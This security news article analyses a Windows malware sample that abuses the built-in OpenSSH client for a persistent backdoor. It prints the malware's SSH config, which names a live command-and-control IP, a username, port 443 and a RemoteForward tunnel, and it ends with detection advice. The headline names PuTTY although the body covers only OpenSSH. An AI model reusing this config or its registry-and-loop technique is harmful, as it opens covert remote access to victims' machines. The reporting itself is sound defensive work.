Hackers Weaponize Free SSH Client PuTTY to Deliver Malware on Windows

OpenSSH has become a standard tool for secure remote management on both Linux and Windows systems.

Since its inclusion as a default component in Windows 10 version 1803, attackers have increasingly exploited its presence, leveraging it as a “Living Off the Land Binary” (LOLBIN).

This means adversaries use trusted system tools ssh.exe to evade detection and establish persistent access.

A recent malware sample, disguised as dllhost.exe, demonstrates this abuse.

According to the report, the malware attempts to start the legitimate SSHService program and, if unsuccessful, reads or creates a registry key (SOFTWARESSHservice) to store a randomly chosen port for future connections.

This tactic not only helps the malware maintain stealth but also leverages the Windows Registry, a common persistence mechanism used by many threat actors.

Registry Manipulation and SSH Configuration

The malware’s workflow involves several technical steps:

• Registry Key Usage:
  The malware checks for a registry key to retrieve the port number used by the SSH service.
• If absent, it generates and saves a new random port.
• Using the Windows Registry for such configuration data is a prevalent technique among various malware families for persistence and stealth.
• SSH Configuration File Creation:
  The malware writes a custom SSH config file in c:windowstempconfig, specifying the attacker’s Command and Control (C2) server, user credentials, and port.
• The configuration includes parameters such as RemoteForward, StrictHostKeyChecking, and others.
• However, a syntax error in the RemoteForward line renders the file invalid for legitimate SSH usage, but the intention is clear: to enable port forwarding and remote access.
• Process Execution:
  The malware enters an infinite loop, periodically sleeping before launching ssh.exe With the malicious configuration file.
• This ensures persistent attempts to connect to the attacker’s infrastructure.

Sample SSH Configuration Created by Malware:

textHost version
    Hostname 193.187.174.3
    User ugueegfueuagu17t1424acs
    Port 443
    ServerAliveInterval 60
    ServerAliveCountMax 15
    RemoteForward 40909
    StrictHostKeyChecking no
    SessionType None

Note: The correct syntax for RemoteForward should be:

textRemoteForward [bind_address:]port local_address:local_port

The provided configuration omits the required local address and port, highlighting a flaw in the malware’s implementation.

Stealth, Persistence, and Detection Challenges

Attackers’ use of legitimate system binaries and registry keys complicates detection.

The malware’s reliance on OpenSSH’s default behavior, such as forking new processes and redirecting standard input/output, can mimic normal administrative activity, making it difficult for traditional security tools to distinguish malicious sessions from legitimate ones.

Furthermore, registry-based persistence is a well-documented tactic, with many advanced threats modifying or hiding registry keys to evade removal and maintain access.

Common Persistence and Detection Evasion Techniques:

The integration of OpenSSH into default Windows installations has expanded the attack surface for adversaries, who now routinely abuse trusted system tools for persistence and covert access.

Defenders should monitor for unusual registry modifications, unexpected SSH configuration files, and anomalous process launches involving ssh.exe.

Regular integrity checks and behavioral monitoring are essential to detect such threats before they can establish a persistent foothold.

OpenSSH’s ubiquity and flexibility make it a powerful tool for both administrators and attackers—continuous monitoring and advanced detection strategies are critical to defend against simple yet effective SSH backdoors.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!